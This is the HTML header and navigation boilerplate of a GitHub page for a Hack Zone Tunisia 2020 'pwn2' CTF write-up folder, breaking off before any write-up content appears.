<meta name="viewport" content="width=device-width"> <meta name="description" content="Contribute to KEERRO/ctf-writeups development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/e68933ac284b7f665c8ea555e19d7e6118920c67571ea8ca1312106e9058e23e/KEERRO/ctf-writeups" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="ctf-writeups/Hack Zone Tunisia 2020/pwn/pwn2 at master · KEERRO/ctf-writeups" /><meta name="twitter:description" content="Contribute to KEERRO/ctf-writeups development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/e68933ac284b7f665c8ea555e19d7e6118920c67571ea8ca1312106e9058e23e/KEERRO/ctf-writeups" /><meta property="og:image:alt" content="Contribute to KEERRO/ctf-writeups development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="ctf-writeups/Hack Zone Tunisia 2020/pwn/pwn2 at master · KEERRO/ctf-writeups" /><meta property="og:url" content="https://github.com/KEERRO/ctf-writeups" /><meta property="og:description" content="Contribute to KEERRO/ctf-writeups development by creating an account on GitHub." /> <link rel="assets" href="https://github.githubassets.com/">
<meta name="hostname" content="github.com">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS">
<meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload">
<meta name="turbo-cache-control" content="no-preview" data-turbo-transient="">
<meta data-hydrostats="publish">
<meta name="go-import" content="github.com/KEERRO/ctf-writeups git https://github.com/KEERRO/ctf-writeups.git">
<meta name="octolytics-dimension-user_id" content="46076094" /><meta name="octolytics-dimension-user_login" content="KEERRO" /><meta name="octolytics-dimension-repository_id" content="162845937" /><meta name="octolytics-dimension-repository_nwo" content="KEERRO/ctf-writeups" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="162845937" /><meta name="octolytics-dimension-repository_network_root_nwo" content="KEERRO/ctf-writeups" />
<link rel="canonical" href="https://github.com/KEERRO/ctf-writeups/tree/master/Hack%20Zone%20Tunisia%202020/pwn/pwn2" data-turbo-transient> <meta name="turbo-body-classes" content="logged-out env-production page-responsive">
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" />
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;">
<div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button>
<div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg>
<div class="flex-1"> Sign up </div>
<div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div>
<div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide">
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div>
Explore
All features
Documentation
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
GitHub Skills
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Blog
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For
Enterprise
Teams
Startups
Education
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
By Solution
CI/CD & Automation
DevOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
DevSecOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Case Studies
Customer Stories
Resources
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4">
<div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div>
<div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div>
Repositories
Topics
Trending
Collections
</div>
Pricing
</nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0">
<div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="162845937" data-scoped-search-url="/KEERRO/ctf-writeups/search" data-owner-scoped-search-url="/users/KEERRO/search" data-unscoped-search-url="/search" data-turbo="false" action="/KEERRO/ctf-writeups/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="fA08NGCSMeZkEyXaGynZ36UsrNWCB+v4uIkJyf/wQyRuQM9GOdWRz/F+HXp5mdOuhfvgvg+YhVQfLzoseTO99g==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
